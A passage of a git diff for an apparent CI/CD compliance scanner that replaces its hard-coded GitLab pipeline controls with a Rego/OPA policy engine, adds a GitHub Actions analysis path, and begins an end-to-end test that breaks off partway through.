+// docs/REFACTOR_MULTI_PROVIDER.md Β§8 Phase A.
func forEachIssueCode(result *AnalysisResult, fn func(ErrorCode)) {
if result == nil {
return
}
- if r := result.ImageForbiddenTagsResult; r != nil && !r.Skipped {
- for _, issue := range r.Issues {
- fn(issue.Code)
- }
- }
- if r := result.ImageAuthorizedSourcesResult; r != nil && !r.Skipped {
- for _, issue := range r.Issues {
- fn(issue.Code)
- }
- }
- if r := result.BranchProtectionResult; r != nil && !r.Skipped {
- for _, issue := range r.Issues {
- fn(issue.Code)
- }
- }
- if r := result.HardcodedJobsResult; r != nil && !r.Skipped {
- for _, issue := range r.Issues {
- fn(issue.Code)
- }
- }
- if r := result.OutdatedIncludesResult; r != nil && !r.Skipped {
- for _, issue := range r.Issues {
- fn(issue.Code)
- }
- }
- if r := result.ForbiddenVersionsIncludesResult; r != nil && !r.Skipped {
- for _, issue := range r.Issues {
- fn(issue.Code)
- }
- }
- if r := result.RequiredComponentsResult; r != nil && !r.Skipped {
- for _, issue := range r.Issues {
- fn(issue.Code)
- }
- for _, issue := range r.OverriddenIssues {
- fn(issue.Code)
- }
- }
- if r := result.RequiredTemplatesResult; r != nil && !r.Skipped {
- for _, issue := range r.Issues {
- fn(issue.Code)
- }
- for _, issue := range r.OverriddenIssues {
- fn(issue.Code)
- }
- }
- if r := result.DebugTraceResult; r != nil && !r.Skipped {
- for _, issue := range r.Issues {
- fn(issue.Code)
- }
- }
- if r := result.VariableInjectionResult; r != nil && !r.Skipped {
- for _, issue := range r.Issues {
- fn(issue.Code)
- }
- }
- if r := result.SecurityJobsWeakenedResult; r != nil && !r.Skipped {
- for _, issue := range r.Issues {
- fn(issue.Code)
- }
- }
- if r := result.UnverifiedScriptsResult; r != nil && !r.Skipped {
- for _, issue := range r.Issues {
- fn(issue.Code)
- }
- }
- if r := result.JobVariablesOverrideResult; r != nil && !r.Skipped {
- for _, issue := range r.Issues {
- fn(issue.Code)
- }
- }
- if r := result.DockerInDockerResult; r != nil && !r.Skipped {
- for _, issue := range r.Issues {
- fn(issue.Code)
- }
+ for _, f := range result.Findings {
+ fn(ErrorCode(f.Code))
}
}
@@ -286,6 +221,23 @@ func scoreLetterFromPoints(finalPoints float64) string {
}
}
+// FindingsByControl groups Rego findings by their declared ControlName
+// (from the issue-code registry). Findings whose code has no registry
+// entry land under the "" key so the caller can still surface them if
+// they want. The map values preserve the input order so downstream
+// tables read deterministically.
+func FindingsByControl(findings []opaengine.Finding) map[string][]opaengine.Finding {
+ out := map[string][]opaengine.Finding{}
+ for _, f := range findings {
+ control := ""
+ if info := LookupCode(ErrorCode(f.Code)); info != nil {
+ control = info.ControlName
+ }
+ out[control] = append(out[control], f)
+ }
+ return out
+}
+
// ScoreLetterMeaning returns a short human-readable description of what a
// letter score implies about the pipeline. It is used by CLI banners,
// merge request comments, and documentation so wording stays consistent.
diff --git a/control/task.go b/control/task.go
index 0a0fb21..8995292 100644
--- a/control/task.go
+++ b/control/task.go
@@ -1,6 +1,7 @@
package control
import (
+ "context"
"fmt"
"os"
"path/filepath"
@@ -8,26 +9,18 @@ import (
"github.com/getplumber/plumber/collector"
"github.com/getplumber/plumber/configuration"
"github.com/getplumber/plumber/gitlab"
+ opaengine "github.com/getplumber/plumber/internal/engine/opa"
+ "github.com/getplumber/plumber/internal/ir"
+ "github.com/getplumber/plumber/policies"
"github.com/sirupsen/logrus"
)
-const (
- // Control names match .plumber.yaml keys exactly.
- controlContainerImageMustNotUseForbiddenTags = "containerImageMustNotUseForbiddenTags"
- controlContainerImageMustComeFromAuthorizedSources = "containerImageMustComeFromAuthorizedSources"
- controlBranchMustBeProtected = "branchMustBeProtected"
- controlPipelineMustNotIncludeHardcodedJobs = "pipelineMustNotIncludeHardcodedJobs"
- controlIncludesMustBeUpToDate = "includesMustBeUpToDate"
- controlIncludesMustNotUseForbiddenVersions = "includesMustNotUseForbiddenVersions"
- controlPipelineMustIncludeComponent = "pipelineMustIncludeComponent"
- controlPipelineMustIncludeTemplate = "pipelineMustIncludeTemplate"
- controlPipelineMustNotEnableDebugTrace = "pipelineMustNotEnableDebugTrace"
- controlPipelineMustNotUseUnsafeVariableExpansion = "pipelineMustNotUseUnsafeVariableExpansion"
- controlSecurityJobsMustNotBeWeakened = "securityJobsMustNotBeWeakened"
- controlPipelineMustNotExecuteUnverifiedScripts = "pipelineMustNotExecuteUnverifiedScripts"
- controlPipelineMustNotOverrideJobVariables = "pipelineMustNotOverrideJobVariables"
- controlPipelineMustNotUseDockerInDocker = "pipelineMustNotUseDockerInDocker"
-)
+// controlBranchMustBeProtected is the sole .plumber.yaml control key
+// the task flow still references directly β to decide whether to fetch
+// branch-protection metadata from the GitLab API before invoking the
+// Rego engine. Every other control is config-driven end-to-end through
+// the catalog in catalog.go.
+const controlBranchMustBeProtected = "branchMustBeProtected"
// shouldRunControl applies --controls / --skip-controls filtering for a control.
// If --controls is set, only listed controls are eligible.
@@ -79,6 +72,196 @@ func clearProgressLine(conf *configuration.Configuration) {
// analysisStepCount is the total number of progress steps reported during analysis.
const analysisStepCount = 18
+// runRegoEngine invokes the Rego/OPA rule engine on the GitLab
+// collector outputs and returns the aggregated findings. It projects
+// the collector data onto the provider-neutral IR via
+// collector.ToNormalizedPipeline, then delegates evaluation (policy
+// loading, config projection, enabled-control filtering) to
+// evaluatePolicies. With the historical Go controls retired (see the
+// call site in RunAnalysis), the engine is the authoritative
+// compliance path. On any failure the returned slice is nil and the
+// error is logged at Warn level inside evaluatePolicies, so the
+// overall analysis still completes.
+//
+// protectionData may be nil when the branchMustBeProtected control is
+// not configured or its data collection failed; branch policies then
+// see no branches.
+func runRegoEngine(
+ l *logrus.Entry,
+ conf *configuration.Configuration,
+ project *gitlab.Project,
+ originData *collector.GitlabPipelineOriginData,
+ imageData *collector.GitlabPipelineImageData,
+ protectionData *collector.GitlabProtectionAnalysisData,
+) []opaengine.Finding {
+ pipeline := collector.ToNormalizedPipeline(
+ conf.ProjectPath,
+ project.DefaultBranch,
+ project.CiConfPath,
+ originData,
+ imageData,
+ protectionData,
+ )
+ return evaluatePolicies(l, conf.PlumberConfig, pipeline)
+}
+
+// evaluatePolicies loads the embedded Rego policies from policies.FS
+// and evaluates them against pipeline. Provider-agnostic: the caller
+// is responsible for building the IR from whatever data source it has
+// (GitLab collectors or the GitHub workflow scanner).
+//
+// Failure handling is deliberately soft: a load or evaluation error is
+// logged at Warn level and nil is returned so the overall analysis
+// still completes. Findings are filtered through
+// FilterFindingsByEnabledControls before being returned, so disabled
+// controls never surface results.
+func evaluatePolicies(l *logrus.Entry, pc *configuration.PlumberConfig, pipeline *ir.NormalizedPipeline) []opaengine.Finding {
+ l.Info("Running Rego/OPA rule engine")
+ engine := opaengine.New()
+ if err := engine.LoadFromFS(policies.FS); err != nil {
+ l.WithError(err).Warn("Failed to load embedded Rego policies")
+ return nil
+ }
+ // context.Background: no caller-supplied context reaches this depth
+ // yet; evaluation runs in-process against already-collected data.
+ findings, err := engine.Evaluate(context.Background(), pipeline, buildEngineConfig(pc))
+ if err != nil {
+ l.WithError(err).Warn("Rego/OPA engine evaluation failed")
+ return nil
+ }
+ findings = FilterFindingsByEnabledControls(findings, pc)
+ l.WithField("findingCount", len(findings)).Info("Rego/OPA engine evaluation completed")
+ return findings
+}
+
+// buildEngineConfig projects the relevant bits of the user's .plumber.yaml
+// onto a Rego-friendly map. Policies read it as `input.config.<section>`.
+// Only the sections consumed by already-ported policies are included;
+// additional entries land with each new policy. Returns nil when pc is
+// nil or no relevant section is configured, so the engine sees an
+// absent config rather than an empty one.
+func buildEngineConfig(pc *configuration.PlumberConfig) map[string]any {
+ if pc == nil {
+ return nil
+ }
+ cfg := map[string]any{}
+
+ if c := pc.Controls.ContainerImageMustNotUseForbiddenTags; c != nil {
+ if len(c.Tags) > 0 {
+ cfg["imageMutableTag"] = map[string]any{
+ "forbiddenTags": c.Tags,
+ }
+ }
+ if c.IsPinnedByDigestRequired() {
+ cfg["containerImageMustNotUseForbiddenTags"] = map[string]any{
+ "mustBePinnedByDigest": true,
+ }
+ }
+ }
+
+ if c := pc.Controls.PipelineMustNotEnableDebugTrace; c != nil && len(c.ForbiddenVariables) > 0 {
+ cfg["debugTrace"] = map[string]any{
+ "forbiddenVariables": c.ForbiddenVariables,
+ }
+ }
+
+ if c := pc.Controls.PipelineMustNotOverrideJobVariables; c != nil && len(c.Variables) > 0 {
+ cfg["jobVariablesOverride"] = map[string]any{
+ "protectedVariables": c.Variables,
+ }
+ }
+
+ if c := pc.Controls.SecurityJobsMustNotBeWeakened; c != nil && len(c.SecurityJobPatterns) > 0 {
+ cfg["securityJobsWeakened"] = map[string]any{
+ "securityJobPatterns": c.SecurityJobPatterns,
+ "allowFailureMustBeFalse": c.AllowFailureMustBeFalse.IsEnabled(true),
+ "whenMustNotBeManual": c.WhenMustNotBeManual.IsEnabled(true),
+ "rulesMustNotBeRedefined": c.RulesMustNotBeRedefined.IsEnabled(true),
+ }
+ }
+
+ if c := pc.Controls.PipelineMustNotUseUnsafeVariableExpansion; c != nil && len(c.DangerousVariables) > 0 {
+ cfg["unsafeVariableExpansion"] = map[string]any{
+ "dangerousVariables": c.DangerousVariables,
+ "allowedPatterns": c.AllowedPatterns,
+ }
+ }
+
+ // Pointer fields are forwarded only when explicitly set, so the
+ // Rego policy can distinguish "unset" from a deliberate false/zero.
+ if c := pc.Controls.BranchMustBeProtected; c != nil {
+ entry := map[string]any{
+ "namePatterns": c.NamePatterns,
+ }
+ if c.DefaultMustBeProtected != nil {
+ entry["defaultMustBeProtected"] = *c.DefaultMustBeProtected
+ }
+ if c.AllowForcePush != nil {
+ entry["allowForcePush"] = *c.AllowForcePush
+ }
+ if c.CodeOwnerApprovalRequired != nil {
+ entry["codeOwnerApprovalRequired"] = *c.CodeOwnerApprovalRequired
+ }
+ if c.MinPushAccessLevel != nil {
+ entry["minPushAccessLevel"] = *c.MinPushAccessLevel
+ }
+ if c.MinMergeAccessLevel != nil {
+ entry["minMergeAccessLevel"] = *c.MinMergeAccessLevel
+ }
+ cfg["branchMustBeProtected"] = entry
+ }
+
+ // defaultBranchIsForbiddenVersion defaults to false when unset.
+ if c := pc.Controls.IncludesMustNotUseForbiddenVersions; c != nil {
+ defaultForbidden := false
+ if c.DefaultBranchIsForbiddenVersion != nil {
+ defaultForbidden = *c.DefaultBranchIsForbiddenVersion
+ }
+ cfg["includesForbiddenVersions"] = map[string]any{
+ "forbiddenVersions": c.ForbiddenVersions,
+ "defaultBranchIsForbiddenVersion": defaultForbidden,
+ }
+ }
+
+ // trustDockerHubOfficial defaults to false when unset.
+ if c := pc.Controls.ContainerImageMustComeFromAuthorizedSources; c != nil {
+ trustOfficial := false
+ if c.TrustDockerHubOfficialImages != nil {
+ trustOfficial = *c.TrustDockerHubOfficialImages
+ }
+ cfg["imageAuthorizedSources"] = map[string]any{
+ "trustedUrls": c.TrustedUrls,
+ "trustDockerHubOfficial": trustOfficial,
+ }
+ }
+
+ if c := pc.Controls.PipelineMustNotExecuteUnverifiedScripts; c != nil && len(c.TrustedUrls) > 0 {
+ cfg["unverifiedScripts"] = map[string]any{
+ "trustedUrls": c.TrustedUrls,
+ }
+ }
+
+ // Required-groups sections are emitted only when the control is
+ // enabled AND its group patterns resolve without error; resolution
+ // errors are silently treated as "nothing required" here.
+ if c := pc.Controls.PipelineMustIncludeComponent; c != nil && c.IsEnabled() {
+ if groups, err := c.GetResolvedRequiredGroups(); err == nil && len(groups) > 0 {
+ cfg["pipelineMustIncludeComponent"] = map[string]any{
+ "requiredGroups": toAnyGroups(groups),
+ }
+ }
+ }
+
+ if c := pc.Controls.PipelineMustIncludeTemplate; c != nil && c.IsEnabled() {
+ if groups, err := c.GetResolvedRequiredGroups(); err == nil && len(groups) > 0 {
+ cfg["pipelineMustIncludeTemplate"] = map[string]any{
+ "requiredGroups": toAnyGroups(groups),
+ }
+ }
+ }
+
+ if c := pc.Controls.ActionsMustBePinnedByCommitSha; c != nil && c.IsEnabled() {
+ entry := map[string]any{}
+ if len(c.TrustedOwners) > 0 {
+ entry["trustedOwners"] = c.TrustedOwners
+ }
+ cfg["actionsMustBePinnedByCommitSha"] = entry
+ }
+
+ if len(cfg) == 0 {
+ return nil
+ }
+ return cfg
+}
+
+// toAnyGroups converts a [][]string (DNF requiredGroups) into a nested
+// []any slice so OPA sees it as a plain JSON array of arrays.
+// NOTE(review): assumes the outer slice is the OR level and each inner
+// slice the AND level of the DNF — confirm against the policy side.
+func toAnyGroups(groups [][]string) []any {
+ out := make([]any, len(groups))
+ for i, g := range groups {
+ inner := make([]any, len(g))
+ for j, p := range g {
+ inner[j] = p
+ }
+ out[i] = inner
+ }
+ return out
+}
+
// RunAnalysis executes the complete pipeline analysis for a GitLab project
func RunAnalysis(conf *configuration.Configuration) (*AnalysisResult, error) {
l := l.WithFields(logrus.Fields{
@@ -100,14 +283,8 @@ func RunAnalysis(conf *configuration.Configuration) (*AnalysisResult, error) {
project, err := gitlab.FetchProjectDetails(conf.ProjectPath, conf.GitlabToken, conf.GitlabURL, conf)
if err != nil {
l.WithError(err).Error("Failed to fetch project from GitLab")
- // Cannot fetch project - compliance is 0
result.CiValid = false
result.CiMissing = true
- result.ImageForbiddenTagsResult = &GitlabImageForbiddenTagsResult{
- Version: ControlTypeGitlabImageForbiddenTagsVersion,
- Compliance: 0,
- Error: err.Error(),
- }
return result, err
}
@@ -201,14 +378,8 @@ func RunAnalysis(conf *configuration.Configuration) (*AnalysisResult, error) {
pipelineOriginData, pipelineOriginMetrics, err := originDC.Run(projectInfo, conf.GitlabToken, conf)
if err != nil {
l.WithError(err).Error("Pipeline Origin data collection failed")
- // Data collection failed - compliance is 0, cannot continue to controls
result.CiValid = false
result.CiMissing = true
- result.ImageForbiddenTagsResult = &GitlabImageForbiddenTagsResult{
- Version: ControlTypeGitlabImageForbiddenTagsVersion,
- Compliance: 0,
- Error: err.Error(),
- }
return result, err
}
@@ -253,12 +424,6 @@ func RunAnalysis(conf *configuration.Configuration) (*AnalysisResult, error) {
pipelineImageData, pipelineImageMetrics, err := imageDC.Run(projectInfo, conf.GitlabToken, conf, pipelineOriginData)
if err != nil {
l.WithError(err).Error("Pipeline Image data collection failed")
- // Data collection failed - compliance is 0, cannot continue to controls
- result.ImageForbiddenTagsResult = &GitlabImageForbiddenTagsResult{
- Version: ControlTypeGitlabImageForbiddenTagsVersion,
- Compliance: 0,
- Error: err.Error(),
- }
return result, err
}
@@ -273,268 +438,30 @@ func RunAnalysis(conf *configuration.Configuration) (*AnalysisResult, error) {
result.PipelineImageData = pipelineImageData
result.PipelineOriginData = pipelineOriginData
- ///////////////////
- // Run Controls
- ///////////////////
-
- // 3. Run Forbidden Image Tags control
- reportProgress(conf, 4, analysisStepCount, "Checking forbidden image tags")
- l.Info("Running Forbidden Image Tags control")
-
- // Load control configuration from PlumberConfig (required)
- forbiddenTagsConf := &GitlabImageForbiddenTagsConf{}
- if shouldRunControl(controlContainerImageMustNotUseForbiddenTags, conf) {
- if err := forbiddenTagsConf.GetConf(conf.PlumberConfig); err != nil {
- l.WithError(err).Error("Failed to load ImageForbiddenTags config from .plumber.yaml file")
- return result, fmt.Errorf("invalid configuration: %w", err)
- }
- } else {
- forbiddenTagsConf.Enabled = false
- }
-
- forbiddenTagsResult := forbiddenTagsConf.Run(pipelineImageData)
- result.ImageForbiddenTagsResult = forbiddenTagsResult
-
- // 4. Run Image Authorized Sources control
- reportProgress(conf, 5, analysisStepCount, "Checking authorized image sources")
- l.Info("Running Image Authorized Sources control")
-
- authorizedSourcesConf := &GitlabImageAuthorizedSourcesConf{}
- if shouldRunControl(controlContainerImageMustComeFromAuthorizedSources, conf) {
- if err := authorizedSourcesConf.GetConf(conf.PlumberConfig); err != nil {
- l.WithError(err).Error("Failed to load ImageAuthorizedSources config from .plumber.yaml file")
- return result, fmt.Errorf("invalid configuration: %w", err)
- }
- } else {
- authorizedSourcesConf.Enabled = false
- }
-
- authorizedSourcesResult := authorizedSourcesConf.Run(pipelineImageData)
- result.ImageAuthorizedSourcesResult = authorizedSourcesResult
-
- // 5. Run Pipeline Must Not Include Hardcoded Jobs control
- reportProgress(conf, 6, analysisStepCount, "Checking hardcoded jobs")
- l.Info("Running Pipeline Must Not Include Hardcoded Jobs control")
-
- hardcodedJobsConf := &GitlabPipelineHardcodedJobsConf{}
- if shouldRunControl(controlPipelineMustNotIncludeHardcodedJobs, conf) {
- if err := hardcodedJobsConf.GetConf(conf.PlumberConfig); err != nil {
- l.WithError(err).Error("Failed to load HardcodedJobs config from .plumber.yaml file")
- return result, fmt.Errorf("invalid configuration: %w", err)
- }
- } else {
- hardcodedJobsConf.Enabled = false
- }
-
- hardcodedJobsResult := hardcodedJobsConf.Run(pipelineOriginData)
- result.HardcodedJobsResult = hardcodedJobsResult
-
- // 6. Run Includes Must Be Up To Date control
- reportProgress(conf, 7, analysisStepCount, "Checking includes versions")
- l.Info("Running Includes Must Be Up To Date control")
-
- outdatedConf := &GitlabPipelineIncludesOutdatedConf{}
- if shouldRunControl(controlIncludesMustBeUpToDate, conf) {
- if err := outdatedConf.GetConf(conf.PlumberConfig); err != nil {
- l.WithError(err).Error("Failed to load IncludesOutdated config from .plumber.yaml file")
- return result, fmt.Errorf("invalid configuration: %w", err)
- }
- } else {
- outdatedConf.Enabled = false
- }
-
- outdatedResult := outdatedConf.Run(pipelineOriginData)
- result.OutdatedIncludesResult = outdatedResult
-
- // 7. Run Includes Must Not Use Forbidden Versions control
- reportProgress(conf, 8, analysisStepCount, "Checking forbidden versions")
- l.Info("Running Includes Must Not Use Forbidden Versions control")
-
- forbiddenVersionConf := &GitlabPipelineIncludesForbiddenVersionConf{}
- if shouldRunControl(controlIncludesMustNotUseForbiddenVersions, conf) {
- if err := forbiddenVersionConf.GetConf(conf.PlumberConfig); err != nil {
- l.WithError(err).Error("Failed to load ForbiddenVersions config from .plumber.yaml file")
- return result, fmt.Errorf("invalid configuration: %w", err)
- }
- } else {
- forbiddenVersionConf.Enabled = false
- }
-
- forbiddenVersionResult := forbiddenVersionConf.Run(pipelineOriginData, projectInfo.DefaultBranch)
- result.ForbiddenVersionsIncludesResult = forbiddenVersionResult
-
- // 8. Run Branch Must Be Protected control (if enabled)
- reportProgress(conf, 9, analysisStepCount, "Checking branch protection")
+ // Fetch branch-protection metadata when the user configured the
+ // corresponding control — the Rego policy needs the protection
+ // settings to check every branch against the declared bar.
+ var protectionData *collector.GitlabProtectionAnalysisData
if shouldRunControl(controlBranchMustBeProtected, conf) {
- branchProtectionConfig := conf.PlumberConfig.GetBranchMustBeProtectedConfig()
- if branchProtectionConfig != nil && branchProtectionConfig.IsEnabled() {
- l.Info("Running Branch Must Be Protected control")
-
- // Run Protection data collection first
+ if cfg := conf.PlumberConfig.GetBranchMustBeProtectedConfig(); cfg != nil && cfg.IsEnabled() {
+ reportProgress(conf, 9, analysisStepCount, "Checking branch protection")
protectionDC := &collector.GitlabProtectionDataCollection{}
- protectionData, _, err := protectionDC.Run(projectInfo, conf.GitlabToken, conf)
- if err != nil {
- l.WithError(err).Error("Protection data collection failed")
- // Data collection failed - set compliance to 0 but continue
- result.BranchProtectionResult = &GitlabBranchProtectionResult{
- Enabled: true,
- Compliance: 0,
- Version: ControlTypeGitlabProtectionBranchProtectionNotCompliantVersion,
- Error: err.Error(),
- }
+ pData, _, pErr := protectionDC.Run(projectInfo, conf.GitlabToken, conf)
+ if pErr != nil {
+ l.WithError(pErr).Warn("Protection data collection failed; branch policies will see no branches")
} else {
- // Run the branch protection control
- branchProtectionControl := NewGitlabBranchProtectionControl(branchProtectionConfig)
- branchProtectionResult := branchProtectionControl.Run(protectionData, projectInfo)
- result.BranchProtectionResult = branchProtectionResult
+ protectionData = pData
}
- } else {
- l.Debug("Branch Must Be Protected control is disabled or not configured")
- }
- } else {
- result.BranchProtectionResult = &GitlabBranchProtectionResult{
- Enabled: false,
- Skipped: true,
- Compliance: 100.0,
- Version: ControlTypeGitlabProtectionBranchProtectionNotCompliantVersion,
- }
- }
-
- // 9. Run Pipeline Must Include Component control
- reportProgress(conf, 10, analysisStepCount, "Checking required components")
- l.Info("Running Pipeline Must Include Component control")
-
- requiredComponentsConf := &GitlabPipelineRequiredComponentsConf{}
- if shouldRunControl(controlPipelineMustIncludeComponent, conf) {
- if err := requiredComponentsConf.GetConf(conf.PlumberConfig); err != nil {
- l.WithError(err).Error("Failed to load RequiredComponents config from .plumber.yaml file")
- return result, fmt.Errorf("invalid configuration: %w", err)
}
- } else {
- requiredComponentsConf.Enabled = false
}
- requiredComponentsResult := requiredComponentsConf.Run(pipelineOriginData, conf.GitlabURL)
- result.RequiredComponentsResult = requiredComponentsResult
-
- // 10. Run Pipeline Must Include Template control
- reportProgress(conf, 11, analysisStepCount, "Checking required templates")
- l.Info("Running Pipeline Must Include Template control")
-
- requiredTemplatesConf := &GitlabPipelineRequiredTemplatesConf{}
- if shouldRunControl(controlPipelineMustIncludeTemplate, conf) {
- if err := requiredTemplatesConf.GetConf(conf.PlumberConfig); err != nil {
- l.WithError(err).Error("Failed to load RequiredTemplates config from .plumber.yaml file")
- return result, fmt.Errorf("invalid configuration: %w", err)
- }
- } else {
- requiredTemplatesConf.Enabled = false
- }
-
- requiredTemplatesResult := requiredTemplatesConf.Run(pipelineOriginData)
- result.RequiredTemplatesResult = requiredTemplatesResult
-
- // 11. Run Pipeline Must Not Enable Debug Trace control
- reportProgress(conf, 12, analysisStepCount, "Checking debug trace variables")
- l.Info("Running Pipeline Must Not Enable Debug Trace control")
-
- debugTraceConf := &GitlabPipelineDebugTraceConf{}
- if shouldRunControl(controlPipelineMustNotEnableDebugTrace, conf) {
- if err := debugTraceConf.GetConf(conf.PlumberConfig); err != nil {
- l.WithError(err).Error("Failed to load DebugTrace config from .plumber.yaml file")
- return result, fmt.Errorf("invalid configuration: %w", err)
- }
- } else {
- debugTraceConf.Enabled = false
- }
-
- debugTraceResult := debugTraceConf.Run(pipelineOriginData)
- result.DebugTraceResult = debugTraceResult
-
- // 12. Run Pipeline Must Not Use Unsafe Variable Expansion control
- reportProgress(conf, 13, analysisStepCount, "Checking unsafe variable expansion")
- l.Info("Running Pipeline Must Not Use Unsafe Variable Expansion control")
-
- variableInjectionConf := &GitlabPipelineVariableInjectionConf{}
- if shouldRunControl(controlPipelineMustNotUseUnsafeVariableExpansion, conf) {
- if err := variableInjectionConf.GetConf(conf.PlumberConfig); err != nil {
- l.WithError(err).Error("Failed to load VariableInjection config from .plumber.yaml file")
- return result, fmt.Errorf("invalid configuration: %w", err)
- }
- } else {
- variableInjectionConf.Enabled = false
- }
-
- variableInjectionResult := variableInjectionConf.Run(pipelineOriginData)
- result.VariableInjectionResult = variableInjectionResult
-
- // 13. Run Security Jobs Must Not Be Weakened control
- reportProgress(conf, 14, analysisStepCount, "Checking security jobs weakening")
- l.Info("Running Security Jobs Must Not Be Weakened control")
-
- securityJobsWeakenedConf := &GitlabSecurityJobsWeakenedConf{}
- if shouldRunControl(controlSecurityJobsMustNotBeWeakened, conf) {
- if err := securityJobsWeakenedConf.GetConf(conf.PlumberConfig); err != nil {
- l.WithError(err).Error("Failed to load SecurityJobsWeakened config from .plumber.yaml file")
- return result, fmt.Errorf("invalid configuration: %w", err)
- }
- } else {
- securityJobsWeakenedConf.Enabled = false
+ // Rego/OPA rule engine evaluation. With all 19 historical Go
+ // controls retired (see docs/REFACTOR_MULTI_PROVIDER.md §8 Phase A),
+ // the engine is the single authoritative compliance path.
+ if conf.PlumberConfig.IsEngineEnabled() {
+ result.Findings = runRegoEngine(l, conf, project, pipelineOriginData, pipelineImageData, protectionData)
}
-
- securityJobsWeakenedResult := securityJobsWeakenedConf.Run(pipelineOriginData)
- result.SecurityJobsWeakenedResult = securityJobsWeakenedResult
-
- // 14. Run Pipeline Must Not Execute Unverified Scripts control
- reportProgress(conf, 15, analysisStepCount, "Checking unverified script execution")
- l.Info("Running Pipeline Must Not Execute Unverified Scripts control")
-
- unverifiedScriptsConf := &GitlabPipelineUnverifiedScriptsConf{}
- if shouldRunControl(controlPipelineMustNotExecuteUnverifiedScripts, conf) {
- if err := unverifiedScriptsConf.GetConf(conf.PlumberConfig); err != nil {
- l.WithError(err).Error("Failed to load UnverifiedScripts config from .plumber.yaml file")
- return result, fmt.Errorf("invalid configuration: %w", err)
- }
- } else {
- unverifiedScriptsConf.Enabled = false
- }
-
- unverifiedScriptsResult := unverifiedScriptsConf.Run(pipelineOriginData)
- result.UnverifiedScriptsResult = unverifiedScriptsResult
-
- // 15. Run Pipeline Must Not Override Job Variables control
- reportProgress(conf, 16, analysisStepCount, "Checking job variable overrides")
- l.Info("Running Pipeline Must Not Override Job Variables control")
-
- jobVarOverrideConf := &GitlabPipelineJobVariablesOverrideConf{}
- if shouldRunControl(controlPipelineMustNotOverrideJobVariables, conf) {
- if err := jobVarOverrideConf.GetConf(conf.PlumberConfig); err != nil {
- l.WithError(err).Error("Failed to load JobVariablesOverride config from .plumber.yaml file")
- return result, fmt.Errorf("invalid configuration: %w", err)
- }
- } else {
- jobVarOverrideConf.Enabled = false
- }
-
- jobVarOverrideResult := jobVarOverrideConf.Run(pipelineOriginData)
- result.JobVariablesOverrideResult = jobVarOverrideResult
-
- // 16. Run Pipeline Must Not Use Docker-in-Docker control
- reportProgress(conf, 17, analysisStepCount, "Checking Docker-in-Docker services")
- l.Info("Running Pipeline Must Not Use Docker-in-Docker control")
-
- dockerInDockerConf := &GitlabPipelineDockerInDockerConf{}
- if shouldRunControl(controlPipelineMustNotUseDockerInDocker, conf) {
- if err := dockerInDockerConf.GetConf(conf.PlumberConfig); err != nil {
- l.WithError(err).Error("Failed to load DockerInDocker config from .plumber.yaml file")
- return result, fmt.Errorf("invalid configuration: %w", err)
- }
- } else {
- dockerInDockerConf.Enabled = false
- }
-
- dockerInDockerResult := dockerInDockerConf.Run(pipelineOriginData)
- result.DockerInDockerResult = dockerInDockerResult
+ result.ProtectionData = protectionData
reportProgress(conf, analysisStepCount, analysisStepCount, "Analysis complete")
diff --git a/control/task_github.go b/control/task_github.go
new file mode 100644
index 0000000..27af238
--- /dev/null
+++ b/control/task_github.go
@@ -0,0 +1,69 @@
+package control
+
+import (
+ "github.com/getplumber/plumber/collector"
+ "github.com/getplumber/plumber/configuration"
+ "github.com/sirupsen/logrus"
+)
+
+// RunGitHubAnalysis is the GitHub counterpart of RunAnalysis. It scans
+// .github/workflows/*.{yml,yaml} under conf.GitRepoRoot, evaluates the
+// embedded Rego policies against the resulting IR, and returns an
+// AnalysisResult whose only populated fields are the project metadata
+// and Findings. No legacy Go control fields are set — GitHub support is
+// Rego-only by design (see docs/REFACTOR_MULTI_PROVIDER.md §4).
+func RunGitHubAnalysis(conf *configuration.Configuration) (*AnalysisResult, error) {
+ l := logrus.WithFields(logrus.Fields{
+ "action": "RunGitHubAnalysis",
+ "projectPath": conf.ProjectPath,
+ "gitRepoRoot": conf.GitRepoRoot,
+ })
+ l.Info("Starting GitHub Actions analysis")
+
+ // Forward conf.ProgressFunc to the collector so the analyze-
+ // command spinner animates during the slow GitHub API enrichment
+ // phase. The collector's progress contract is ProgressFunc(step,
+ // total, message); we map directly onto the same-shape callback
+ // conf exposes.
+ var progressFn collector.ProgressFunc
+ if conf.ProgressFunc != nil {
+ progressFn = collector.ProgressFunc(conf.ProgressFunc)
+ }
+ pipeline, partial, err := collector.ScanGitHubWorkflowsWithProgress(
+ conf.ProjectPath,
+ conf.Branch,
+ conf.GitRepoRoot,
+ progressFn,
+ )
+ if err != nil {
+ l.WithError(err).Error("Failed to scan GitHub workflows")
+ return nil, err
+ }
+ // Per-file parse failures are non-fatal: each skipped workflow is
+ // logged as a warning and analysis continues with the rest.
+ for _, perr := range partial {
+ l.WithError(perr).Warn("GitHub workflow parse: partial failure (file skipped)")
+ }
+
+ if conf.ProgressFunc != nil {
+ total := collector.TotalProgressStepsForPipeline(pipeline)
+ conf.ProgressFunc(total-1, total, "Evaluating policies")
+ }
+ // CiValid/CiMissing mirror whether any jobs were discovered; no
+ // separate CI-config fetch happens on the GitHub path.
+ result := &AnalysisResult{
+ ProjectPath: conf.ProjectPath,
+ DefaultBranch: conf.Branch,
+ CIConfigSource: "local",
+ CiValid: len(pipeline.Jobs) > 0,
+ CiMissing: len(pipeline.Jobs) == 0,
+ Findings: evaluatePolicies(l, conf.PlumberConfig, pipeline),
+ }
+ if conf.ProgressFunc != nil {
+ total := collector.TotalProgressStepsForPipeline(pipeline)
+ conf.ProgressFunc(total, total, "Analysis complete")
+ }
+
+ l.WithFields(logrus.Fields{
+ "jobCount": len(pipeline.Jobs),
+ "findingCount": len(result.Findings),
+ }).Info("GitHub Actions analysis completed")
+
+ return result, nil
+}
diff --git a/control/task_github_test.go b/control/task_github_test.go
new file mode 100644
index 0000000..ad7c2b0
--- /dev/null
+++ b/control/task_github_test.go
@@ -0,0 +1,103 @@
+package control
+
+import (
+ "os"
+ "path/filepath"
+ "testing"
+
+ "github.com/getplumber/plumber/configuration"
+)
+
+// TestRunGitHubAnalysis_EndToEnd drives the full GitHub path against a
+// temp repo with one workflow and two jobs: one using a mutable image
+// tag (alpine:latest) and one pinned to an exact version
+// (node:20.10.0). Only the mutable tag must produce an ISSUE-102
+// finding.
+func TestRunGitHubAnalysis_EndToEnd(t *testing.T) {
+ tmp := t.TempDir()
+ wfDir := filepath.Join(tmp, ".github", "workflows")
+ if err := os.MkdirAll(wfDir, 0o755); err != nil {
+ t.Fatal(err)
+ }
+ workflow := `name: CI
+on: push
+jobs:
+ lint:
+ runs-on: ubuntu-latest
+ container: alpine:latest
+ test:
+ runs-on: ubuntu-latest
+ container:
+ image: node:20.10.0
+`
